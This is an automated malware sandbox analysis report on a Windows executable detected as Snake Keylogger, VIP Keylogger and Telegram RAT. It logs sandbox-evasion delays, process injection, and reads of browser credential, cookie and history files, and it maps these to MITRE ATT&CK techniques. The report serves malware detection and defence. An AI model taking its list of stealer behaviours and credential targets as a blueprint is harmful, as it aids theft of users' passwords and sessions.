Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -597266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -597156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -597047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -596937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -596828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -596719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -596594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -596484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -596375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -596266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -596154s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -596032s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -595906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -595794s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -595451s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -595333s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -595203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -595093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -594984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -594875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -594765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -594655s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -594547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -594422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -594312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -594203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -594093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -593984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -593875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -593765s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 599327	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 599082	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 598962	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 598732	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 598618	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 598509	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 598265	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 598155	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 598047	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 597937	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 597609	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 597496	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 597388	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 597266	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 596266	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 596154	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 596032	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 595794	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 595451	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 595333	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 595093	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 594875	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 594765	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 594655	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 594547	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 594422	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 594312	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 594203	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 594093	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 593984	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 593875	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 593765	Jump to behavior

Source: UqdykLLTA2.exe, 00000003.00000002.3716120715.000000000342E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd5efac3df2044<
Source: UqdykLLTA2.exe, 00000003.00000002.3713323192.00000000016F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\UqdykLLTA2.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\UqdykLLTA2.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\UqdykLLTA2.exe

Memory written: C:\Users\user\Desktop\UqdykLLTA2.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process created: C:\Users\user\Desktop\UqdykLLTA2.exe "C:\Users\user\Desktop\UqdykLLTA2.exe"			Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process created: C:\Users\user\Desktop\UqdykLLTA2.exe "C:\Users\user\Desktop\UqdykLLTA2.exe"			Jump to behavior

Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Queries volume information: C:\Users\user\Desktop\UqdykLLTA2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Queries volume information: C:\Users\user\Desktop\UqdykLLTA2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\UqdykLLTA2.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000003.00000002.3716120715.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.UqdykLLTA2.exe.4dee318.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UqdykLLTA2.exe.4e676c8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.UqdykLLTA2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UqdykLLTA2.exe.4dee318.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UqdykLLTA2.exe.4e676c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3712524269.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1275846370.0000000004E67000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1275846370.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: UqdykLLTA2.exe PID: 6372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UqdykLLTA2.exe PID: 5880, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.UqdykLLTA2.exe.4dee318.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UqdykLLTA2.exe.4e676c8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.UqdykLLTA2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UqdykLLTA2.exe.4dee318.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UqdykLLTA2.exe.4e676c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3712524269.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3716120715.00000000033E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1275846370.0000000004E67000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1275846370.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: UqdykLLTA2.exe PID: 6372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UqdykLLTA2.exe PID: 5880, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\UqdykLLTA2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior

Source: Yara match	File source: 0.2.UqdykLLTA2.exe.4dee318.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UqdykLLTA2.exe.4e676c8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.UqdykLLTA2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UqdykLLTA2.exe.4dee318.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UqdykLLTA2.exe.4e676c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3712524269.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1275846370.0000000004E67000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1275846370.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: UqdykLLTA2.exe PID: 6372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UqdykLLTA2.exe PID: 5880, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000003.00000002.3716120715.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.UqdykLLTA2.exe.4dee318.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UqdykLLTA2.exe.4e676c8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.UqdykLLTA2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UqdykLLTA2.exe.4dee318.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UqdykLLTA2.exe.4e676c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3712524269.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1275846370.0000000004E67000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1275846370.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: UqdykLLTA2.exe PID: 6372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UqdykLLTA2.exe PID: 5880, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.UqdykLLTA2.exe.4dee318.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UqdykLLTA2.exe.4e676c8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.UqdykLLTA2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UqdykLLTA2.exe.4dee318.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UqdykLLTA2.exe.4e676c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3712524269.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3716120715.00000000033E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1275846370.0000000004E67000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1275846370.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: UqdykLLTA2.exe PID: 6372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UqdykLLTA2.exe PID: 5880, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	1 Masquerading	1 OS Credential Dumping	1 Security Software Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	4 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	31 Obfuscated Files or Information	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	25 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report UqdykLLTA2.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
UqdykLLTA2.exe